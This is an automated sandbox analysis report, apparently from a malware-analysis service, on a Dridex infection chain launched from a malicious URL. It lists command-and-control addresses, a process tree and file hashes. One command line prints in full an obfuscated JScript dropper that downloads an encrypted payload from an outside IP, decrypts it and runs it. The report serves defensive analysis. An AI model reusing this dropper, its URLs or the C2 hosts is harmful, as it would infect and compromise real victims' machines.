Analysis
- Max time kernel: 148s
- Max time network: 156s
- Platform: windows10_x64
- Resource: win10v20210410
- Submitted: 21-06-2021 05:06
- Static task: static1
- URLScan task: urlscan1
  Sample: https://exitmagall.xyz/iduew73
- Behavioral task: behavioral1
  Sample: https://exitmagall.xyz/iduew73
  Resource: win7v20210408
General
Malware Config
Extracted family: dridex
- Botnet: 10111
- C2: 139.59.59.242:443
- C2: 91.207.28.33:13786
- C2: 178.128.197.110:4664
Signatures
Blocklisted process makes network request (1 IoC)
- Process: wscript.exe (PID 768, flow 23)
Executes dropped EXE (1 IoC)
- Process: buc10.exe (PID 4280)
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
- Process: buc10.exe; key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Processes: iexplore.exe, IEXPLORE.EXE (registry keys created and values set under \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
- Process: iexplore.exe (PID 4480)
Suspicious use of FindShellTrayWindow (1 IoC)
- Process: iexplore.exe (PID 4480)
Suspicious use of SetWindowsHookEx (6 IoCs)
- Processes: iexplore.exe (PID 4480, 2 events); IEXPLORE.EXE (PID 4796, 4 events)
Suspicious use of WriteProcessMemory (15 IoCs)
- PID 4480 iexplore.exe wrote to memory of PID 4796 IEXPLORE.EXE (3 events)
- PID 4796 IEXPLORE.EXE wrote to memory of PID 4016 cmd.exe (3 events)
- PID 4016 cmd.exe wrote to memory of PID 768 wscript.exe (3 events)
- PID 768 wscript.exe wrote to memory of PID 4268 cmd.exe (3 events)
- PID 4268 cmd.exe wrote to memory of PID 4280 buc10.exe (3 events)
Processes
Level 1: C:\Program Files\Internet Explorer\iexplore.exe
  Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew73
  - Modifies Internet Explorer settings
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
Level 2: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4480 CREDAT:82945 /prefetch:2
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
Level 3: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""
  - Suspicious use of WriteProcessMemory
Level 4: C:\Windows\SysWOW64\wscript.exe
  Command line: wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /c buc10.exe
  - Suspicious use of WriteProcessMemory
Level 6: C:\Users\Admin\AppData\Local\Temp\buc10.exe
  Command line: buc10.exe
  - Executes dropped EXE
  - Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: a64e2d26dd6f37ed569251d6dfc524ca
  SHA1: 8133be8cb0509b8e3ed907715e8df1785c555c6e
  SHA256: 4ca0b012928887c383bce5a4a38f87e85ff1fc9720b0f5ad0aec0bec982e3cdc
  SHA512: a00f8a5ea363e36f56a309becc2faa3ccbf1c5c32671da78338b526d634b0f4c074d44a69280f5d6b629ec050a87950b1236ed7c2650abc1d26b9cdbd3cfbfdd
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: 5bbd3ec3dff6d6862e6593835cb7ee96
  SHA1: 0432100849d8e576738c47c29947bd75188a43d3
  SHA256: 1976c6c5336d2617a01aca1ea9c37e54c16631f23393e202e54d9f6a42a6eebf
  SHA512: eb35fa3839aa265a457e89338ba150fd6c35a282aa047a3f6eef2fc484047ad24b4b6baf49f3a60538902a6082174037de6cc5f5141d52f6e0e883ec40bd5859
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LZQJAN73.cookie
  MD5: ca8b70c46725556f8dbe80a44b68ab16
  SHA1: 7e821dc28878b84c5def01256e70d720c6c17c0e
  SHA256: d06e61f584d0223a65a9acae6a3feb444bc299d3b840a9073b7bdbc7011484cf
  SHA512: 3171e78ff7aaa94d3598bc5bb4ddb426fcd05e78f3d65f9a0d17f5b897f0c6d875b77fc98b63d58702621bf82c786faa2b66a2b9130f61de324f7ba756871133
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TGWWQG9R.cookie
  MD5: e2ebdfed3499bea3ba6fa6e756060948
  SHA1: 23be95d327bdb6c2bf26efc906560ea2ba3b6cab
  SHA256: 1603d3f773d78c156c248fd19b7319736e7686cb4805e51beda8a66f5cf623b2
  SHA512: 01133dada21698e2a35308f6acf0393078545aef43a647dfe1704a9d0b994f18c4e0b46f9e0c72446fbce9d8344890a2dca740186ec2c6f2a2efa2950c79db76
- C:\Users\Admin\AppData\Local\Temp\3.tMp
  MD5: 60fc00422b399db85f87d41b8328976d
  SHA1: bb85034acad8025f97e5bb236443debaf8926e4b
  SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
  SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
- C:\Users\Admin\AppData\Local\Temp\buc10.exe
  MD5: dea4a7e0d6430869ba9b80d841293e07
  SHA1: 34f609fcd39daae376fd266c7e57d099ecfe19d1
  SHA256: 3339390888ea181b768ea5a5aa34f537d73705cfe60fdc163e6024e157e8ee69
  SHA512: f6fcd8696fefbfe143389e38fc9915dfb6696d8444e9e497932ce464f963c539f3da2c87ce91802ef65af6ff5c14386dfddc945dc735708fa5b29b8809770e0a
- memory/768-117-0x0000000000000000-mapping.dmp
- memory/4016-116-0x0000000000000000-mapping.dmp
- memory/4268-119-0x0000000000000000-mapping.dmp
- memory/4280-120-0x0000000000000000-mapping.dmp
- memory/4280-123-0x00000000020A0000-0x00000000020DC000-memory.dmp (Filesize: 240KB)
- memory/4280-124-0x0000000000400000-0x0000000000578000-memory.dmp (Filesize: 1.5MB)
- memory/4480-114-0x00007FF9EB810000-0x00007FF9EB87B000-memory.dmp (Filesize: 428KB)
- memory/4796-115-0x0000000000000000-mapping.dmp